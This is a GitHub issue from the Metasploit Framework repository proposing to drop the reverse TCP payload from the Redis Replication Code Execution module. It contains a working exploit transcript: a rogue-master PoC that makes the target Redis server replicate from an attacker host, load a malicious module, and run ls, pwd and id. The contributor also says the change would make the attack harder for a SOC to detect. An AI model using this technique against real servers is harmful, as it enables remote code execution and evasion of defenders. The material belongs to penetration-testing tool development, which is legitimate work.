search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.33k stars 14.02k forks source link

Possible to remove the reverse tcp payload from Redis Replication Code Execution module #14407

Closed tkmru closed 1 year ago

tkmru commented 4 years ago

Summary

The Redis Replication Code Execution module uses reverse tcp to run the commands, but redis allows you to execute commands and get the results without using a reverse shell.

Basic example

After executing MODE LOAD exp.so, I could execute id command in redis-cli, as shown in the following execution example.

root@efb5ffa4adf5:/rogue# redis-cli -h redis
redis:6379> MODULE LOAD ./dump.rdb
OK
redis:6379> shell.exec "id"
"uid=999(redis) gid=999(redis) groups=999(redis)\n"

The same is possible with socket communication, even without using redis-cli. For example, this PoC does not use a reverse shell.

$ python3 rogue3.py --rhost 127.0.0.1 --rport 6379 --lhost 192.168.153.17 --lport 21000
TARGET 127.0.0.1:6379
SERVER 192.168.153.17:21000
[<-] ['*3', '$7', 'SLAVEOF', '$14', '192.168.153.17', '$5', '21000']
[->] ['+OK']
[<-] ['*4', '$6', 'CONFIG', '$3', 'SET', '$10', 'dbfilename', '$6', 'exp.so']
[->] ['+OK']
[->] ['*1', '$4', 'PING']
[<-] ['+PONG']
[->] ['*3', '$8', 'REPLCONF', '$14', 'listening-port', '$4', '6379']
[<-] ['+OK']
[->] ['*5', '$8', 'REPLCONF', '$4', 'capa', '$3', 'eof', '$4', 'capa', '$6', 'psync2']
[<-] ['+OK']
[->] ['*3', '$5', 'PSYNC', '$40', 'b86569ad04674b9a77f2e2195e6cd9e981c30d2d', '$1', '1']
[<-] ['*3', '$6', 'MODULE', '$4', 'LOAD', '$8', './exp.so']
[->] ['+OK']
[<-] ['*3', '$7', 'SLAVEOF', '$2', 'NO', '$3', 'ONE']
[->] ['+OK']
[<<] ls
[<-] ['*2', '$11', 'system.exec', '$7', 'ls 2>&1']
[->] ['$8', '\x08exp.so']
[<<] pwd
[<-] ['*2', '$11', 'system.exec', '$8', 'pwd 2>&1']
[->] ['$6', '/data']

Motivation

By removing the reverse tcp payload, we can shave off one useless external communication from this module. I also think it will probably make it harder for the SOC to detect when attacking. I want to try it!

smcintyre-r7 commented 1 year ago

Sounds like we might be able to add an ARCH_CMD target. Combine that with the existing cmd/unix/generic payload, and you'd be able to execute whatever payload you want.

smcintyre-r7 commented 1 year ago

Actually we already have a module for it. You can use auxiliary/scanner/redis/redis_server to just run a command.